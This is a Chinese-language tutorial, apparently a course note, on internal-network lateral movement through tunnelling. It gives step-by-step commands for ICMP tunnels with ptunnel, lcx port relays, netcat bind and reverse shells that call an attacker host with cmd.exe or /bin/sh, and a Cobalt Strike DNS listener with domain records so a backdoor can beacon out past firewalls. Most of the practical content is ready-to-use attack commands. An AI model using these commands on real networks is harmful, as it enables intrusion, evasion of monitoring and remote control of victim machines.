内网安全-域横向网络传输应用层隧道技术
隧道技术:在数据通信被拦截的情况下利用隧道技术封装改变通信协议进行绕过拦截
解决的问题:CS、MSF 无法上线,数据传输不稳定无回显,出口数据被监控,网络通信存在问题等
常用的隧道技术有以下三种:
网络层:IPv6 隧道## 标题、ICMP 隧道
传输层:TCP 隧道、UDP 隧道、常规端口转发
应用层:SSH 隧道、HTTP/S 隧道、DNS 隧道
案例 1-网络传输应用层检测连通性-检测
先测试目标是否支持这些协议
1. TCP 协议
用“瑞士军刀”——netcat
执行 nc 命令:nc <IP> <端口>2. HTTP 协议
用“curl”工具,执行 curl <IP 地址:端口>命令。如果远程主机开启了相应的端口,且内网可连接外网的
话,就会输出相应的端口信息3. ICMP 协议
用“ping”命令,执行 ping <IP 地址/域名>4. DNS 协议
检测 DNS 连通性常用的命令是“nslookup”和“dig”
nslookup 是 windows 自带的 DNS 探测命令
dig 是 linux 系统自带的 DNS 探测命令
案例 2-网络层 ICMP 隧道 ptunnel 使用-检测,利用
kali2020-Target2-Target3pingtunnel 是把 tcp/udp/sock5 流量伪装成 icmp 流量进行转发的工具-p ##表示连接 icmp 隧道另一端的机器 IP(即目标服务器)
-lp ##表示需要监听的本地 tcp 端口
-da ##指定需要转发的机器的 IP(即目标内网某一机器的内网 IP)
-dp ##指定需要转发的机器的端口(即目标内网某一机器的内网端口)
-x ##设置连接的密码Webserver:./ptunnel -x xiaodi
Hacker xiaodi:./ptunnel -p 192.168.76.150 -lp 1080 -da 192.168.33.33 -dp 3389 -x xiaodi #转发的 3389
请求数据给本地 1080
Hacker xiaodi:rdesktop 127.0.0.1 1080老版本介绍:https://github.com/f1vefour/ptunnel(需自行编译)
新版本介绍:https://github.com/esrrhs/pingtunnel(二次开发版)先通过ping命令看目标是否又icmp协议,再把tcp/udp/sock5等协议的流量伪装成icmp协议
因为tcp/udp/sock5等协议很有可能被防火墙拦截
通过webshell在webserver主机上面上传ptunnel并运行,就会在本地开一个隧道,-x后面是密码,等待别人连接
kali处执行命令./ptunnel -p 192.168.76.150 -lp 1080 -da 192.168.33.33 -dp 3389 -x xiaodi
通过密码对webserver主机建立连接,并通过webserver主机去访问DC主机的3389远程桌面端口,将数据转发给本地kali的1080端口
kali连接本地的1080端口
因为1080端口接收了DC主机3389端口返回的数据,所以可直接连接上DC的远程桌面
这样的话,数据流量走的就不是TCP协议,而是icmp
案例 3-传输层转发隧道 Portmap 使用-检测,利用
windows: lcx
linux:portmap通过webshell将lcx上传至受害者服务器,并执行
lcx -slave 攻击 IP 3131 127.0.0.1 3389 //将本地 3389 给跳板 IP 的 3131跳板机处执行
lcx -listen 3131 3333 //监听 3131 转发至 3333kali这边通过rdesktop连接跳板机的3333端口
案例 4-传输层转发隧道 Netcat 使用-检测,利用,功能
Kali2020-god\webserver-god\sqlserver|dc1.双向连接反弹 shell正向:攻击连接受害
受害:nc -ldp 1234 -e /bin/sh //linux
nc -ldp 1234 -e c:\windows\system32\cmd.exe //windows
攻击:nc 192.168.76.132 1234 //主动连接反向:受害连接攻击
攻击:nc -lvp 1234
受害:nc 攻击主机 IP 1234 -e /bin/sh
nc 攻击主机 IP 1234 -e c:\windows\system32\cmd.exe2.多向连接反弹 shell-配合转发
反向:
god\Webserver:Lcx.exe -listen 2222 3333
god\Sqlserver:nc 192.168.3.31 2222 -e c:\windows\system32\cmd.exe
kali 或本机:nc -v 192.168.76.143 33333.相关 netcat 主要功能测试
指纹服务:nc -nv 192.168.76.143
端口扫描:nc -v -z 192.168.76.143 1-100
端口监听:nc -lvp xxxx
文件传输:nc -lp 1111 >1.txt|nc -vn xx.xx.x.x 1111 <1.txt -q 1
反弹 Shell:见上
1.双向连接反弹 shell
正向连接
在受害者主机上执行nc -ldp 1234 -e c:\windows\system32\cmd.exe //windows
,将cmd窗口反弹到1234端口上
攻击者这边直接通过nc访问受害者的1234端口
反向连接
攻击主机监听自己的1234端口
受害者主动执行cmd窗口,并将cmd反弹到攻击者主机的1234端口上
攻击者这边接收到cmd会话
2.多向连接反弹 shell-配合转发
有跳板机时
在受害者处执行nc,将cmd窗口反弹给跳板中间机的2222端口
跳板机这里用Lcx执行,将本地2222端口转发到本地的3333端口上
攻击者kali这里,用nc去访问跳板机的3333端口
成功反弹回受害者的cmd窗口会话
3.相关 netcat 主要功能测试
指纹服务:nc -nv 192.168.76.143
端口扫描:nc -v -z 192.168.76.143 1-100
端口监听:nc -lvp xxxx
文件传输:nc -lp 1111 >1.txt|nc -vn xx.xx.x.x 1111 <1.txt -q 1
反弹 Shell:见上
案例 5-应用层 DNS 隧道配合 CS 上线-检测,利用,说明
当你的后门是用http协议生成的,后门返回的数据就是通过http来传输的
当你的后门是用dns协议生成的,后门返回的数据也是通过相应的dns协议传输的
当对方的防火墙检测http协议时,你的http后门执行后,返回的数据会被对方的防火墙拦截
当常见协议监听器被拦截时,可以换其他协议上线,其中 dns 协议上线基本通杀
1.云主机 Teamserver 配置端口 53 启用-udp2.买一个域名修改解析记录如下:
A 记录->cs 主机名->CS 服务器 IP
NS 记录->ns1 主机名->上个 A 记录地址
NS 记录->ns2 主机名->上个 A 记录地址3.配置 DNS 监听器内容如下:
ns1.xiaodi8.com
ns2.xiaodi8.com
cs.xiaodi8.com4.生成后门执行上线后启用命令:
beacon> checkin
[*] Tasked beacon to checkin
beacon> mode dns-txt
dns添加解析A记录,主机名为cs,指向cs服务器的ip
添加NS记录,指向A记录的地址,主机名为ns1和ns2
当对方用NS去解析时,解析的地址是A记录的地址,仍然会对cs服务器进行访问
cs处添加监听器,Payload选择DNS
添加两个DNS Hosts,为刚才设置的ns1和ns2的网址
DNS Host为刚才设置的cs的网址
配置完监听器后,生成后门
选择刚才设置的监听器
将生成的后门上传到目标主机,并执行
cs处接收到目标主机上线
因为是dns协议传输,所以特别慢,并且要执行几个命令才能对目标直接进行控制
输入完后等待一会,等待目标主机返回数据,则成功拿到shell
可通过shell执行命令
内网安全-域横向网络传输应用层隧道技术相关推荐
- p71 内网安全-域横向网络传输应用层隧道技术
数据来源 必备知识点: 1.代理和隧道技术区别? 代理:只是解决网络的访问问题(如:有些内网访问不到,可以用代理实现) 隧道:隧道不仅是解决网络的通信问题,更大的作用是绕过过滤,突破防火墙/入侵检测系 ...
- 【内网安全】域横向网络传输应用层隧道技术
必备知识点: 1.代理和隧道技术区别? 代理只是为了解决网络通信问题,有些内网访问不到,可以用代理实现 隧道不仅是解决网络的通信问题,同时更大的作用是被防火墙甚至入侵检测系统进行拦截的东西的突破. 2 ...
- 内网安全-域横向批量atschtasksimpacket
目录 0x01 横向渗透明文传递 1.1 渗透流程 1.2 IPC技术 1.3 [at] & [schtasks] 1.3.1 假设已经找到DC的用户名密码(具体后面再详细讲),由于域控DC ...
- p66 内网安全-域横向批量atschtasksimpacket
数据来源 本文仅用于信息安全的学习,请遵守相关法律法规,严禁用于非法途径.若观众因此作出任何危害网络安全的行为,后果自负,与本人无关. 基本概念 DMZ区域:称为"隔离区",也称' ...
- 第69天-内网安全-域横向 CobaltStrikeSPNRDP
思维导图 知识点 演示案例 域横向移动RDP传递-Mimikatz 除了之前讲到的IPC,WMI,SMB等协议的连接外,获取到的明文密码或HASH密文也可以通过RDP协议进行连接操作. RDP 远程显 ...
- 内网安全 - 域横向 PTHPTKPTT
域横向 PTH&PTK&PTT 基础知识 域横向移动PTH传递-Mimikatz 域横向移动PTK传递-mimikatz 域横向移动 PTT 传递-MS14068(主要)&ke ...
- p69 内网安全-域横向 CobaltStrikeSPNRDP
数据来源 SPN(Secret Private Network缩写)_百度百科 (baidu.com) 演示案例 域横向移动RDP传递-Mimikatz 域横向移动SPN服务-探针,请求,导出,破解, ...
- 内网安全-域横向PTHPTKPTT哈希票据传递
PTH(pass the hash) #利用 lm 或 ntlm 的值进行的渗透测试 PTT(pass the ticket) #利用的票据凭证 TGT 进行的渗透测试 PTK(pass the ke ...
- 内网安全-域横向内网漫游Socks代理隧道技术
因为是两个局域网 当你用kali生成一个后门文件放到目标主机 设置后门的反弹地址时,设置为你的外网地址时,后们会将信息反弹到你的路由器上 设置为内网地址时,又找不到你 案例 1-内网穿透 Ngrok ...
- 内网安全-域横向smbwmi明文或hash传递
知识点1: Windows2012以上版本默认关闭wdigest,攻击者无法从内存中获取明文密码 Windows2012以下版本如安装KB2871997补丁,同样也会导致无法获取明文密码 针对以上情况 ...
最新文章
- ICML 2021刚刚做出了一个「艰难的决定」:将论文接收率直接砍掉10%
- 思维 ---- 两两匹配问题 2021杭电多校第6场 E - Median
- 数据库集群和高可用解决方案
- Selenium3自动化测试——16. 处理HTML5视频播放
- 《如何阅读一本书》之 阅读的层次
- Butter knife 原理
- centos6.9终端命令
- 数据结构回文数c语言,数据结构算法(字符串转整数和回文数)
- 凯撒密码加密器(命令行版)
- pycharm主题方案
- Android 获取时间戳
- 有赞搜索系统的技术内幕
- vue起服务时或npm install时遇到code EPERM errno -4048这样的报错,还有就是文字数量超出盒子可以设置多行省略或单行省略!!!
- 万年历日程提醒c语言,Android 日历 万年历 源代码(支持日程提醒)
- 神经网络与深度学习-9- 网络结构 -PyTorch
- Linux下的C语言——第九节 指针
- 查询tian01\tian02\tian03总和
- Mysql索引介绍及使用注意事项,limit分页查询,慢查询分析
- Alamofire学习(一)网络基础
- 软件测试测试用例执行多少条,软件测试用例执行中有效的策略